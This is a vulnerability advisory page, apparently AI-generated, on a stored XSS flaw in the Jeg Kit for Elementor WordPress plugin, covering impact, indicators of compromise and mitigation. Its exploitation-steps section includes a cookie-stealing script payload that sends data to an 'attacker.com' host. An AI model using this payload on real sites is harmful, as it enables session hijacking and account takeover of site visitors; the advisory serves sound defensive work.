CVE-2026-6916
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-6916 is a Stored Cross-Site Scripting (XSS) vulnerability in the Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets & Templates for WordPress plugin. It affects all versions up to and including 3.1.0, and is caused by insufficient input sanitization and output escaping of the sg_content_number_prefix parameter. The vulnerability was published on May 2, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS flaw in the Fun Fact widget's sg_content_number_prefix parameter. The vulnerable code paths are located in class/elements/views/class-fun-fact-view.php (line 71), class/elements/elementor/class-fun-fact-elementor.php (line 24), and lib/jeg-element/includes/class/elements/class-elements-view-abstract.php (line 251), where user-supplied input is rendered without proper sanitization or escaping (GitHub Advisory). An authenticated attacker with at minimum contributor-level WordPress access can inject a malicious script payload into the parameter, which is then persistently stored and executed in the browser of any user who visits the affected page (Wordfence).

Impact

Successful exploitation allows authenticated contributors to persistently inject arbitrary JavaScript into WordPress pages, which executes in the context of any visitor's browser. This can lead to session token theft, credential harvesting, redirection to malicious sites, or unauthorized actions performed on behalf of compromised users, including site administrators. While availability is not directly impacted, both confidentiality and integrity are affected, with a scope change indicating the injected scripts can impact users beyond the attacker's own session (GitHub Advisory, Wordfence).

Exploitability

No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time (Wordfence). The EPSS score is approximately 0.016–0.021%, placing it in the lower percentiles for near-term exploitation likelihood (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Jeg Kit for Elementor plugin at version 3.1.0 or earlier using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Obtain contributor access: Register or compromise a WordPress account with at minimum contributor-level privileges on the target site.
  3. Navigate to the Fun Fact widget: In the WordPress editor (Elementor), add or edit a page containing the Fun Fact widget provided by the Jeg Kit for Elementor plugin.
  4. Inject malicious payload: Set the sg_content_number_prefix parameter to a crafted XSS payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, and save or publish the page.
  5. Trigger execution: When any user (including administrators) visits the page containing the injected widget, the stored script executes in their browser, enabling session hijacking, credential theft, or further malicious actions (GitHub Advisory, Wordfence).

Indicators of compromise

  • Logs: WordPress audit logs or server access logs showing contributor-level users editing or creating pages with the Jeg Kit Fun Fact widget; unexpected modifications to page content containing <script> tags or encoded JavaScript in the sg_content_number_prefix field.
  • File System: Unexpected changes to WordPress page/post content in the database (wp_posts table) containing obfuscated or encoded script tags associated with Fun Fact widget parameters.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after visiting pages containing the Fun Fact widget; unusual traffic patterns to attacker-controlled infrastructure for cookie or credential exfiltration.
  • Process/Application: Browser developer console errors or unexpected redirects reported by users visiting affected pages; WAF alerts triggered by XSS payloads in page content.

Mitigation and workarounds

Update the Jeg Kit for Elementor plugin to a version newer than 3.1.0, which contains the patch addressing this vulnerability (GitHub Advisory, Wordfence). As interim measures, restrict contributor-level and above access to only trusted users, and deploy a Web Application Firewall (WAF) capable of detecting and blocking XSS payloads. Audit any pages created or modified using the Fun Fact widget by untrusted contributor accounts for signs of injected scripts (Wordfence).

Community reactions

Wordfence included CVE-2026-6916 in its weekly WordPress vulnerability report for the period of April 27–May 3, 2026, noting the patch availability (Wordfence Blog). Sucuri also referenced the vulnerability in its May 2026 vulnerability patch roundup (Sucuri Blog). General community reaction has been routine for a medium-severity WordPress plugin XSS, with no notable controversy or widespread alarm.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19089NONEN/A
  • product-input-fields-for-woocommerce
NoYesAug 10, 2026
CVE-2026-19077NONEN/A
  • copy-delete-posts
NoYesAug 10, 2026
CVE-2026-19075NONEN/A
  • all-in-one-video-gallery
NoYesAug 10, 2026
CVE-2026-19074NONEN/A
  • advanced-classifieds-and-directory-pro
NoYesAug 10, 2026
CVE-2026-19053NONEN/A
  • prosolution-wp-client
NoYesAug 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management